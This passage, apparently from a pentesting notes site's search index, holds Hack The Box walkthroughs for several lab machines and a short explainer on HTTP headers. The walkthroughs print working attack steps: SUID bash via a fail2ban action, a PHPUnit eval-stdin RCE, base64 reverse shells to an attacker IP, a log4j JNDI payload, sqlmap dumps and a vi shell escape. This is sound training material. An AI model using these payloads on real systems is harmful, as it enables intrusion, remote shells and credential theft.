    # create a copy of the file to have rwx permissions\nmv /etc/fail2ban/action.d/iptables-multiport.conf /etc/fail2ban/action.d/iptables-multiport.conf.bak\n# overwrite the existing file with your copy\ncp /etc/fail2ban/action.d/iptables-multiport.conf.bak /etc/fail2ban/action.d/iptables-multiport.conf\n# edit the file and add your lines\nnano /etc/fail2ban/action.d/iptables-multiport.conf\n# In the file, comment the line with the  actionban definition and\n# add:\n# actionban = chmod +s /bin/bash\n# Also in the file, comment the line with the  actionunban definition and\n# add:\n# actionunban = chmod +s /bin/bash\n# CTRL-X -   Yes and ENTER to save changes.\n

    With \"chmod +s /bin/bash\" we're going to give the suid bit to bash. The suid bit provides the user running it the same privileges that the user who created it. In this case, root is the user who created it. If we run it, we'll have root privileges during its execution. The next step is restarting the service to get the file iptables-multiport.conf updated.

    sudo /etc/init.d/fail2ban restart\n

    Now, when we fail to login into the system with ssh more than 5 times, the configuration set in iptables-multiport.conf will take place. For that, from the attacker command line:

    1. We install sshpass, a program that allows us to pass passwords in the command line to ssh. This way we can automate the login process:
    sudo apt install sshpass\n
    1. Write a script in the attacker machine:
    nano wronglogin.sh\n
    #!/bin/bash\n\nsshpass -p \"wrongpassword\" ssh michael@10.10.11.166\nsshpass -p \"wrongpassword\" ssh michael@10.10.11.166\nsshpass -p \"wrongpassword\" ssh michael@10.10.11.166\nsshpass -p \"wrongpassword\" ssh michael@10.10.11.166\nsshpass -p \"wrongpassword\" ssh michael@10.10.11.166\nsshpass -p \"wrongpassword\" ssh michael@10.10.11.166\n

    Add execution permission:

    chmod +x wronglongin.sh\n
    1. Launch the script:
    ./wronglogin.sh\n

    Once the script is executed, the suid bit will be activated for bash. Run:

     ls -l /bin/bash\n

    And you will see:

    -rwsr-sr-x 1 root root 1168776 Oct 20  2022 /bin/bash\n

    Now if we run:

    bash -p\n

    The -p flag turns on privileged mode. In this mode, the $BASH_ENV' and '$ENV' files are not processed, shell functions are not inherited from the environment, and theSHELLOPTS', 'BASHOPTS', 'CDPATH' and 'GLOBIGNORE' variables, if they appear in the environment, are ignored. The result:

    michael@trick:~$ bash -p\nbash-5.0# id\nuid=1001(michael) gid=1001(michael) euid=0(root) egid=0(root) groups=0(root),1001(michael),1002(security)\nbash-5.0# cd /root\nbash-5.0# ls\nf2b.sh  fail2ban  root.txt  set_dns.sh\n

    To display the system flag:

    cat root.txt\n
    ","tags":["walkthrough"]},{"location":"htb-undetected/","title":"HTB undetected","text":"
    nmap -sV -sC -Pn $ip --top-ports 4250\n

    Open ports: 22 and 80.

    Entering the IP in a browser we get to a website.

    Revising the source code, we see that the menu \"Store\" is linking to http://store.djewelry.htb/.

    Another way to find out:

    # with gobuster\ngobuster dns -d djewelry.htb -w /usr/share/seclists/Discovery/DNS/namelist.txt \n

    Open /etc/hosts and add IP and store.djewelry.htb, djewelry.htb.

    After browsing around both websites, we found nothing noticeable, so we try to fuzz both subdomains:

    # With wfuzz\nwfuzz -c --hc 404 -t 200 -u http://store.djewelry.htb/FUZZ -w /usr/share/dirb/wordlists/common.txt  \n\nwfuzz -c --hc 404 -t 200 -u http://djewelry.htb/FUZZ -w /usr/share/dirb/wordlists/common.txt  \n

    Nothing interesting under main domain, but in http://store.djewelry.htb:

    ********************************************************\n* Wfuzz 3.1.0 - The Web Fuzzer                         *\n********************************************************\n\nTarget: http://store.djewelry.htb/FUZZ\nTotal requests: 4614\n\n=====================================================================\nID           Response   Lines    Word       Chars       Payload                    \n=====================================================================\n\n000000001:   200        195 L    475 W      6203 Ch     \"http://store.djewelry.htb/\n                                                        \"                          \n000000013:   403        9 L      28 W       283 Ch      \".htpasswd\"                \n000000012:   403        9 L      28 W       283 Ch      \".htaccess\"                \n000000011:   403        9 L      28 W       283 Ch      \".hta\"                     \n000001114:   301        9 L      28 W       322 Ch      \"css\"                      \n000001648:   301        9 L      28 W       324 Ch      \"fonts\"                    \n000002021:   200        195 L    475 W      6203 Ch     \"index.php\"                \n000001991:   301        9 L      28 W       325 Ch      \"images\"                   \n000002179:   301        9 L      28 W       321 Ch      \"js\"                       \n000003588:   403        9 L      28 W       283 Ch      \"server-status\"            \n000004286:   301        9 L      28 W       325 Ch      \"vendor\"                   \n\nTotal time: 0\nProcessed Requests: 4614\nFiltered Requests: 4603\nRequests/sec.: 0\n

    /vendor is a directory list, so we can browse all files and folders under /vendor.

    After browsing for a while, we get information about this plugin with a vulnerable version installed (all plugins installed with versions: http://store.djewelry.htb/vendor/composer/installed.json). Vulnerable plugin is \"phpunit/phpunit\",\"5.6.2\".

    Some exploits:

    https://blog.ovhcloud.com/cve-2017-9841-what-is-it-and-how-do-we-protect-our-customers/

    In my case:

    curl -XGET --data \"<?php system('whoami');?>\" http://store.djewelry.htb/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php\n
    www-data\n

    Now, we can get a reverse shell:

    My reverse code before b64 it: \"bash -i >& /dev/tcp/10.10.14.2/4444 0>&1\"

    curl -XGET --data \"<?php system('echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4yLzQ0NDQgMD4mMQo=|base64 -d|bash'); ?>\" http://store.djewelry.htb/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php\n

    See a walkthrough: https://0xdf.gitlab.io/2022/07/02/htb-undetected.html

    "},{"location":"htb-unified/","title":"Walkthrough - Unified - A HackTheBox machine","text":"

    Enumerate open services:

    nmap -sC -sV $ip -Pn\n

    Results:

    PORT     STATE SERVICE         VERSION\n22/tcp   open  ssh             OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n|   3072 48add5b83a9fbcbef7e8201ef6bfdeae (RSA)\n| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC82vTuN1hMqiqUfN+Lwih4g8rSJjaMjDQdhfdT8vEQ67urtQIyPszlNtkCDn6MNcBfibD/7Zz4r8lr1iNe/Afk6LJqTt3OWewzS2a1TpCrEbvoileYAl/Feya5PfbZ8mv77+MWEA+kT0pAw1xW9bpkhYCGkJQm9OYdcsEEg1i+kQ/ng3+GaFrGJjxqYaW1LXyXN1f7j9xG2f27rKEZoRO/9HOH9Y+5ru184QQXjW/ir+lEJ7xTwQA5U1GOW1m/AgpHIfI5j9aDfT/r4QMe+au+2yPotnOGBBJBz3ef+fQzj/Cq7OGRR96ZBfJ3i00B/Waw/RI19qd7+ybNXF/gBzptEYXujySQZSu92Dwi23itxJBolE6hpQ2uYVA8VBlF0KXESt3ZJVWSAsU3oguNCXtY7krjqPe6BZRy+lrbeska1bIGPZrqLEgptpKhz14UaOcH9/vpMYFdSKr24aMXvZBDK1GJg50yihZx8I9I367z0my8E89+TnjGFY2QTzxmbmU=\n|   256 b7896c0b20ed49b2c1867c2992741c1f (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBH2y17GUe6keBxOcBGNkWsliFwTRwUtQB3NXEhTAFLziGDfCgBV7B9Hp6GQMPGQXqMk7nnveA8vUz0D7ug5n04A=\n|   256 18cd9d08a621a8b8b6f79f8d405154fb (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKfXa+OM5/utlol5mJajysEsV4zb/L0BJ1lKxMPadPvR\n6789/tcp open  ibm-db2-admin?\n8080/tcp open  http-proxy\n| http-methods: \n|_  Supported Methods: GET HEAD POST OPTIONS\n|_http-title: Did not follow redirect to https://10.129.96.149:8443/manage\n| fingerprint-strings: \n|   FourOhFourRequest: \n|     HTTP/1.1 404 \n|     Content-Type: text/html;charset=utf-8\n|     Content-Language: en\n|     Content-Length: 431\n|     Date: Mon, 08 May 2023 10:46:41 GMT\n|     Connection: close\n|     <!doctype html><html lang=\"en\"><head><title>HTTP Status 404 \n|     Found</title><style type=\"text/css\">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 404 \n|     Found</h1></body></html>\n|   GetRequest, HTTPOptions: \n|     HTTP/1.1 302 \n|     Location: http://localhost:8080/manage\n|     Content-Length: 0\n|     Date: Mon, 08 May 2023 10:46:41 GMT\n|     Connection: close\n|   RTSPRequest, Socks5: \n|     HTTP/1.1 400 \n|     Content-Type: text/html;charset=utf-8\n|     Content-Language: en\n|     Content-Length: 435\n|     Date: Mon, 08 May 2023 10:46:41 GMT\n|     Connection: close\n|     <!doctype html><html lang=\"en\"><head><title>HTTP Status 400 \n|     Request</title><style type=\"text/css\">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 400 \n|_    Request</h1></body></html>\n|_http-open-proxy: Proxy might be redirecting requests\n8443/tcp open  ssl/nagios-nsca Nagios NSCA\n| http-title: UniFi Network\n|_Requested resource was /manage/account/login?redirect=%2Fmanage\n| ssl-cert: Subject: commonName=UniFi/organizationName=Ubiquiti Inc./stateOrProvinceName=New York/countryName=US/organizationalUnitName=UniFi/localityName=New York\n| Subject Alternative Name: DNS:UniFi\n| Issuer: commonName=UniFi/organizationName=Ubiquiti Inc./stateOrProvinceName=New York/countryName=US/organizationalUnitName=UniFi/localityName=New York\n| Public Key type: rsa\n| Public Key bits: 2048\n| Signature Algorithm: sha256WithRSAEncryption\n| Not valid before: 2021-12-30T21:37:24\n| Not valid after:  2024-04-03T21:37:24\n| MD5:   e6be8c035e126827d1fe612ddc76a919\n| SHA-1: 111baa119cca44017cec6e03dc455cfe65f6d829\n| -----BEGIN CERTIFICATE-----\n| MIIDfTCCAmWgAwIBAgIEYc4mlDANBgkqhkiG9w0BAQsFADBrMQswCQYDVQQGEwJV\n

    After visiting https://10.129.96.149:8080/, we are redirected to https://10.129.96.149:8443/manage/account/login

    It's a login panel of Unifi application and version is disclosed: 6.4.54. A quick search in google for \"exploit unifi 6.4.54\" returns that it has a log4j vulnerability.

    For exploiting it:

    sudo apt install openjdk-11-jre maven\n\n\n\ngit clone https://github.com/veracode-research/rogue-jndi \n\ncd rogue-jndi\n\nmvn package\n\n# Once it's build, make a reverse shell in base64 with attacker machine and listening port\necho 'bash -c bash -i >&/dev/tcp/10.10.14.2/4444 0>&1' | base64\n# This will return: YmFzaCAtYyBiYXNoIC1pID4mL2Rldi90Y3AvMTAuMTAuMTQuMi80NDQ0IDA+JjEK\n\n# Get out of rogue-jndi folder and\njava -jar rogue-jndi/target/RogueJndi-1.1.jar --command \"bash -c {echo,YmFzaCAtYyBiYXNoIC1pID4mL2Rldi90Y3AvMTAuMTAuMTQuMi80NDQ0IDA+JjEK}|{base64,-d}|{bash,-i}\" --hostname \"10.129.96.149\"\n# In the bash command, copy paste your reverse shell in base64\n# --hostname: Victim IP\n

    Now, open a terminal, launch netcat abd the listening port you defined in your payload.

    With Burpsuite, get a request for login:

    POST /api/login HTTP/1.1\nHost: 10.129.96.149:8443\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0\nAccept: */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: https://10.129.96.149:8443/manage/account/login\nContent-Type: application/json; charset=utf-8\nOrigin: https://10.129.96.149:8443\nContent-Length: 104\nSec-Fetch-Dest: empty\nSec-Fetch-Mode: cors\nSec-Fetch-Site: same-origin\nTe: trailers\nConnection: close\n\n{\"username\":\"lala\",\"password\":\"lele\",\"remember\":false,\"strict\":true}\n

    As we can read from the Unifi version exploit, the injectable parameter is \"remember\". So we insert there our payload and with Repeater, send the request:

    POST /api/login HTTP/1.1\nHost: 10.129.96.149:8443\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0\nAccept: */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: https://10.129.96.149:8443/manage/account/login\nContent-Type: application/json; charset=utf-8\nOrigin: https://10.129.96.149:8443\nContent-Length: 104\nSec-Fetch-Dest: empty\nSec-Fetch-Mode: cors\nSec-Fetch-Site: same-origin\nTe: trailers\nConnection: close\n\n{\"username\":\"lala\",\"password\":\"lele\",\"remember\":\"${jndi:ldap://10.10.14.2:1389/o=tomcat}\",\"strict\":true}\n

    Once we send that request, our jndi server will resend the reverse shell:

    And in our terminal with the nc listener we will get the reverse shell. Spawn it with:

    SHELL=/bin/bash script -q /dev/null\nCtrl-Z\nstty raw -echo\nfg\nreset\nxterm\n

    user.txt is under /home/michael/

    ","tags":["walkthrough","log4j","jndi","mongodb"]},{"location":"htb-unified/#privilege-escalation","title":"Privilege escalation","text":"

    Do some basic reconnaissance:

    whoami\nid\ngroups\nsudo -l\nuname -a\n

    Also we can see /etc/passwd to see other existing services/users.

    ``bash cat /etc/passwd

    Results:\n
    root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin _apt:x:100:65534::/nonexistent:/usr/sbin/nologin unifi:x:999:999::/home/unifi:/bin/sh mongodb:x:101:102::/var/lib/mongodb:/usr/sbin/nologin
    After user unifi, we have a mondodb service. Also, we knew that under unifi version 6.4.54, it we could get access to the administrator panel of the UniFi application and possibly extract SSH secrets used between the appliances. \n\n[See mongodb cheat sheet](27017-27018-mongodb.md). \n\nFirst thing, find out on which port is running the service:\n
    ps aux | grep mongo
    Results: \n
    unifi 67 0.4 4.2 1103744 85568 ? Sl 11:44 0:46 bin/mongod --dbpath /usr/lib/unifi/data/db --port 27117 --unixSocketPrefix /usr/lib/unifi/run --logRotate reopen --logappend --logpath /usr/lib/unifi/logs/mongod.log --pidfilepath /usr/lib/unifi/run/mongod.pid --bind_ip 127.0.0.1 unifi 5183 0.0 0.0 11468 1108 pts/0 S+ 14:47 0:00 grep mongo
    Port 27117. Let's interact with the MongoDB service by making use of the mongo command line utility and attempting to extract the administrator password. A quick Google search using the keywords UniFi Default Database shows that the default database name for the UniFi application is ace.\n\nFrom the terminal of the victim's machine:\n\n```bash\nmongo --port 27117 ace --eval \"db.admin.find().forEach(printjson);\"\n# mongo: To use mongo interactive command line\n# --port: Indicate the port\n# ace: default database in mongo\n# --eval: evaluate JSON\n

    And now we have...

    MongoDB shell version v3.6.3\nconnecting to: mongodb://127.0.0.1:27117/ace\nMongoDB server version: 3.6.3\n{\n        \"_id\" : ObjectId(\"61ce278f46e0fb0012d47ee4\"),\n        \"name\" : \"administrator\",\n        \"email\" : \"administrator@unified.htb\",\n        \"x_shadow\" : \"$6$Ry6Vdbse$8enMR5Znxoo.WfCMd/Xk65GwuQEPx1M.QP8/qHiQV0PvUc3uHuonK4WcTQFN1CRk3GwQaquyVwCVq8iQgPTt4.\",\n        \"time_created\" : NumberLong(1640900495),\n        \"last_site_name\" : \"default\",\n        \"ui_settings\" : \n``\n\nThe output reveals a user called administrator. Their password hash is located in the x_shadow variable but in this instance it cannot be cracked with any password cracking utilities. Instead we can change the x_shadow password hash with our very own created hash in order to replace the administrators password and authenticate to the administrative panel. To do this we can use the mkpasswd command line utility. The $6$ is the identifier for the hashing algorithm that is being used, which is SHA-512 in this case, therefore we will have to make a hash of the same type.\n\n```bash\nmkpasswd -m sha-512 lalala \n

    It returns: $6$bTJCdmWvffwcSm9p$6FHYn1fesp3WjZesRG20dDQ/bp6Vktrq8aLylXvil8tApzFCguM2MEii63Uemf8BE7jBrB5ZcZwes85JpuXPq0

    With that, now we can update the administrator password. From the terminal of the victim's machine:

    mongo --port 27117 ace --eval 'db.admin.update({\"_id\":\nObjectId(\"61ce278f46e0fb0012d47ee4\")},{$set:{\"x_shadow\":\"$6$bTJCdmWvffwcSm9p$6FHYn1fesp3WjZesRG20dDQ/bp6Vktrq8aLylXvil8tApzFCguM2MEii63Uemf8BE7jBrB5ZcZwes85JpuXPq0\"}})'\n# ObjectId is the one that correlates with the administrator one.\n

    Now, in the admin panel from the browser enter the new credentials for administrator.

    When logged into the dashboard, grab ssh credentials for root user from Settings>Site, tab \"Device Authentication\", SSH Authentication.

    With those credentials, access via ssh connection.

    ","tags":["walkthrough","log4j","jndi","mongodb"]},{"location":"htb-usage/","title":"Walkthrough - Usage, a Hack The Box machine","text":"","tags":["walkthrough"]},{"location":"htb-usage/#about-the-machine","title":"About the machine","text":"data Machine Usage Platform Hackthebox url link OS Linux Difficulty Easy Points 20 ip 10.10.11.18","tags":["walkthrough"]},{"location":"htb-usage/#getting-usertxt-flag","title":"Getting user.txt flag","text":"","tags":["walkthrough"]},{"location":"htb-usage/#enumeration","title":"Enumeration","text":"
    sudo nmap -sV -sC $ip -p-\n

    Results: Port 22 and 80.

    ","tags":["walkthrough"]},{"location":"htb-usage/#browsing-the-app","title":"Browsing the app","text":"

    After entering in http://10.10.11.18, a dns error is displayed. The page is redirected to http://usage.htb.

    I will add that line in my host resolver config file.

    # testing for an existing file\necho \"10.10.11.18    http://usage.htb\" >> /etc/hosts\n

    The application is simple. A Login pannel with a \"Remember your password\" link. An other links to an admin login pannel and a logout feature. Enumeration techniques also gives us some ideas about Laravel framework being in use.

    After testing the login form and the remember your password form, I can detect a SQL injection vulnerability in the remember your password form.

    Previously I registered a user lala@lala.com.

    Payloads for manual detection:

    lala@lala.com' AND 1=1;-- -\n

    lala@lala.com' AND 1=1;-- -\n

    Now, we know that we have a SQL injection, Blind with the AND Boolean technique, so we can use sqlmap with --technique flag set to BUT. We can also save time using the flag --dbms to indicate that is a mysql database:

    sqlmap -r request.txt  -p 'email' --dbms=mysql --level=3 --risk=3 --technique=BUT -v 7 --batch --dbs --dump --threads 3\n\nsqlmap -r request.txt  -p 'email' --dbms=mysql --level=3 --risk=3 --technique=BUT -v 7 --batch -D usage_blog --tables --dump --threads 3\n\nsqlmap -r request.txt  -p 'email' --dbms=mysql --level=3 --risk=3 --technique=BUT -v 7 --batch -D usage_blog -T admin_users --dump --threads 3\n
    ","tags":["walkthrough"]},{"location":"htb-usage/#upload-a-reverse-shell","title":"Upload a reverse shell","text":"

    The admin profile can be edited. The upload feature for the avatar image is vulnerable.

    First, I tried to upload a php file, but files extensions are sanitized client side.

    Then, I uploaded a php reverse shell file using jpg extension. The file was uploaded but it was not executable.

    Finally I used Burpsuite and intercepted the upload of my ivan.jpg file. During the interception I modified the extension to php.

    Finally the reverse shell worked. But for a limited period of time (see steps 1 and 2). Time enough to set up a hook and establish a new connection (see steps 2 and 3) with a bash reverse shell

    rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.49 4444 >/tmp/f\n

    ","tags":["walkthrough"]},{"location":"htb-usage/#getting-usertxt","title":"Getting user.txt","text":"

    First, I spawned a shell:

    SHELL=/bin/bash script -q /dev/null\n

    and printed out the flag:

    cat /home/dash/user.txt\n
    ","tags":["walkthrough"]},{"location":"htb-usage/#getting-roottxt","title":"Getting root.txt","text":"

    First, I perform a lateral movement to the other user present in the machine. For that I cat the /etc/passwd file and I run linpeas.sh script in the machine.

    ","tags":["walkthrough"]},{"location":"htb-usage/#lateral-movement","title":"Lateral movement","text":"

    Enumerate other users with access to a bash terminal:

    cat /etc/passwd | grep -E ^*/bin/bash$\n

    Results:

    root:x:0:0:root:/root:/bin/bash\ndash:x:1000:1000:dash:/home/dash:/bin/bash\nxander:x:1001:1001::/home/xander:/bin/bash\n

    Upload the script linpeas to the victims machine.

    ################\n# In the attacker machine\n###############\n# Download the script from the release page\ncurl https://github.com/peass-ng/PEASS-ng/releases/download/20240414-ed0a5fac/linpeas.sh\n\n# Copy the file to the root of your apache server\ncp linpeas.sh /var/wwww/html\n\n# Start your server \nservice apache2 start\n# Turn it off once you have served your file\n\n################\n# From the victim machine\n################\n# Download the script from the release page or from the attacker server\nwget http://attackerIP/linpeas.sh\n\n# Run the script\nchmod +x linpeash.sh\n./linpeas.sh\n

    Some interesting takeaways from the linpeas.sh results:

    ","tags":["walkthrough"]},{"location":"htb-vaccine/","title":"Vaccine - A HackTheBox machine","text":"

    nmap -sC -sV $ip -Pn\n
    Two open ports: 21 and 80

    Also, from nmap analysys, ftp service at 21 allows us to use anonymous signin with empty password:

    ftp $ip\n\n# enter user \"anonymous\" and hit enter when prompted for password\n
    dir\n# listed appears file backup.zip\n\nget *\n

    Try to open zip file, but it's password protected, so we crak it with johntheripper:

    zip2john nameoffile.zip > zip.hashes\ncat zip.hashes\njohn zip.hashes\n# Proceeding with wordlist:/usr/share/john/password.lst\n# 741852963        (backup.zip)    \n\n\n#Unzip file:\nunzip backup.zip\n\n# Echo index file\ncat index.php\n

    Before the html code there is a piece of php starting the session. Username and password are hard encoded there:

    <?php\nsession_start();\n  if(isset($_POST['username']) && isset($_POST['password'])) {\n    if($_POST['username'] === 'admin' && md5($_POST['password']) === \"2cb42f8734ea607eefed3b70af13bbd3\") {\n      $_SESSION['login'] = \"true\";\n      header(\"Location: dashboard.php\");\n    }\n  }\n?>\n

    In crackstation.net, we obtain that the hash \"2cb42f8734ea607eefed3b70af13bbd3\" was md5 encrypted and that actual password is \"qwerty789\"

    With this, open browser and enter username and password. You will be redirected to: htpp://$ip/dashboard.php

    Search box triggers a error message on frontend when introducing simple quotation mark as imput \"'\":

     ERROR: unterminated quoted string at or near \"'\" LINE 1: Select * from cars where name ilike '%'%' ^\n

    This tells us about a sql injection vulnerability.

    # Ask for backend DBMS\nsqlmap -u http://10.129.95.174/dashboard.php --forms --cookie=\"PHPSESSID=kcr9helek579t5cjcldcbb5fc1\" --batch      \n\n#---------\n# [11:03:27] [INFO] the back-end DBMS is PostgreSQL\n#web server operating system: Linux Ubuntu 20.04 or 20.10 or 19.10 (eoan or focal)\n#web application technology: Apache 2.4.41\n#back-end DBMS: PostgreSQL\n\n\n\n# Ask for databases\nsqlmap -u http://10.129.95.174/dashboard.php --forms --cookie=\"PHPSESSID=kcr9helek579t5cjcldcbb5fc1\" --batch --dbs\n\n# ------\n# [11:06:12] [INFO] fetching database (schema) names available databases [3]:\n# [*] information_schema\n# [*] pg_catalog\n# [*] public\n\n\n\n# Ask for tables in db pg_catalog\nsqlmap -u http://10.129.95.174/dashboard.php --forms --cookie=\"PHPSESSID=kcr9helek579t5cjcldcbb5fc1\" --batch -D pg_catalog --tables\n\n# Response contains 62 tables. \n\n\n# Ask for users\nsqlmap -u http://10.129.95.174/dashboard.php --forms --cookie=\"PHPSESSID=kcr9helek579t5cjcldcbb5fc1\" --batch --users \n\n# -----\n# [11:10:16] [INFO] resumed: 'postgres'\n# database management system users [1]:\n# [*] postgres\n\n\nsqlmap -u http://10.129.95.174/dashboard.php --forms --cookie=\"PHPSESSID=kcr9helek579t5cjcldcbb5fc1\" --batch -D pg_catalog -T pg_user -C passwd,usebypassrls,useconfig,usecreatedb,usename,userepl,usesuper,usesysid,valuntil --dump\n\n\n\n# Ask for passwords\nsqlmap -u http://10.129.95.174/dashboard.php --forms --cookie=\"PHPSESSID=kcr9helek579t5cjcldcbb5fc1\" --batch --passwords --dump\n\n# -----\n# database management system users password hashes:\n# [*] postgres [1]:\n#    password hash: md52d58e0637ec1e94cdfba3d1c26b67d01\n

    First 3 characters are a tip about the hash. Using https://md5.gromweb.com/?md5=2d58e0637ec1e94cdfba3d1c26b67d01 we obtain: The MD5 hash: 2d58e0637ec1e94cdfba3d1c26b67d01 was succesfully reversed into the string: P@s5w0rd!postgres

    Now, as we couldn't spot port 5432 (postgres) open, we will use port-tunneling with ssh.

    ssh UserNameInTheAttackedMachine@IPOfTheAttackedMachine -L 1234:localhost:5432 \n# We will listen for incoming connections on our local port 1234. When a client connects to our local port, the SSH client will forward the connection to the remote server on port 22. This allows the local client to access services on the remote server as if they were running on the local machine.\n# We are forwarding traffic from any given local port, for instance 1234, to the port on which PostgreSQL is listening, namely 5432, on the remote server. We therefore specify port 1234 to the left of localhost, and 5432 to the right, indicating the target port.\n\nssh postgres@10.129.95.174 -L 1234:localhost:5432\n

    After this, we can \"cat\" the user.txt file.

    To escalate provileges, first we can use some commands for basic reconnaissance:

    whoami\nid\nsudo -l\n

    Last one provides us with interesting output:

    User postgres may run the following commands on vaccine:\n    (ALL) /bin/vi /etc/postgresql/11/main/pg_hba.conf\n

    We can abuse suid binaries technique to gain access to root user:

     sudo /bin/vi /etc/postgresql/11/main/pg_hba.conf\n:set shell=/bin/sh\n:shell\n

    Once there, print out root flag:

    cat /root/root.txt\n
    ","tags":["walkthrough"]},{"location":"http-headers/","title":"HTTP headers","text":"Tools
    • Curl

    HTTP (Hypertext Transfer Protocol) is a stateless application layer protocol used for the transmission of resources like web application data and runs on top of TCP.

    It was specifically designed for communication between web browsers and web servers.

    HTTP utilizes the typical client-server architecture for communication, whereby the browser is the client, and the web server is the server.

    Resources are uniquely identified with a URL/URI.

    HTTP has 3 versions; HTTP 1.0, HTTP 1.1., and HTTP/2. And HTTP/3 in on its way.

    • HTTP 1.1 is the most widely used version of HTTP and has several advantages over HTTP 1.0 such as the ability to re-use the same TCP connection, take advantage of the 3 ways handshake that was performed and request for multiple URI\u2019s/Resources in that connection.
    ","tags":["pentesting HTTP headers"]},{"location":"http-headers/#structure-of-a-http-request","title":"Structure of a HTTP request","text":"

    Request Line: The request line is the first line of an HTTP request and contains the following three components:

    HTTP method (e.g., GET, POST, PUT, DELETE, etc.): Indicates the type of request being made.\nURL (Uniform Resource Locator): The address of the resource the client wants to access.\nHTTP version: The version of the HTTP protocol being used (e.g., HTTP/1.1).\n

    Request Headers: they provide additional information about the request. Common headers include:

    User-Agent: Information about the client making the request (e.g., browser type).\nHost: The hostname of the server.\nAccept: The media types the client can handle in the response (e.g., HTML, JSON).\nAuthorization: Credentials for authentication, if required.\nCookie: Information stored on the client-side and sent back to the server with each request.\n
    GET /home/ HTTP/2\nHost: site.com\nCookie: session=cookie-value-00000-00000\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate, br\nDnt: 1\nSec-Gpc: 1\n

    Request Body (Optional): Some HTTP methods (like POST or PUT) include a request body where data is sent to the server, typically in JSON or form data format.

    ","tags":["pentesting HTTP headers"]},{"location":"http-headers/#http-verbs-or-methods","title":"HTTP verbs (or methods)","text":"","tags":["pentesting HTTP headers"]},{"location":"http-headers/#structure-of-a-http-response","title":"Structure of a HTTP response","text":"

    Response headers: Similar to request headers, response headers provide additional information about the response. Common headers include:

    Content-Type: The media type of the response content (e.g., text/html, application/json).\nContent-Length: The size of the response body in bytes.\nSet-Cookie: Used to set cookies on the client-side for subsequent requests.\nCache-Control: Directives for caching behavior.\n

    Response Body (Optional): The response body contains the actual content of the response. For example, in the case of an HTML page, the response body will contain the HTML markup.

    In response to the HTTP Request, the web server will respond with the requested resource, preceded by a bunch of new HTTP response headers. These new response headers from the web server will be used by your web browser to interpret the content contained in the Response content/body of the response.

    An example:

    HTTP/1.1 200 OK\nDate: Fri, 13 Mar 2015 11:26:05 GMT\nCache-Control: private, max-age=0\nContent-Type: text/html; charset=UTF-8\nContent-Encoding: gzip\nServer: gws\nContent-Length: 258\n
    ","tags":["pentesting HTTP headers"]},{"location":"http-headers/#date-header","title":"Date header","text":"

    The \"Date\" header in an HTTP response is used to indicate the date and time when the response was generated by the server. It helps clients and intermediaries to understand the freshness of the response and to synchronize the time between the server and the client. This is used in a blind SQLinjection, to see how long it takes for the server to respond.

    ","tags":["pentesting HTTP headers"]},{"location":"http-headers/#status-code","title":"Status code","text":"

    The status code can be resume in the following chart:

    ","tags":["pentesting HTTP headers"]},{"location":"http-headers/#content-type","title":"Content-Type","text":"

    The \"Content-Type\" header in an HTTP response is used to indicate the media type of the response content. It tells the client what type of data the server is sending so that the client can handle it appropriately.

    List of all content-type headers

    ","tags":["pentesting HTTP headers"]},{"location":"http-headers/#cache-control","title":"Cache-control","text":"

    Cache-control: Cache-control is a header used to specify caching policies for browsers and other caching services. Specifically, the\u00a0Cache-Control\u00a0HTTP header field holds\u00a0directives\u00a0(instructions) \u2014 in both requests and responses \u2014 that control caching in browsers and shared caches (e.g. Proxies, CDNs).

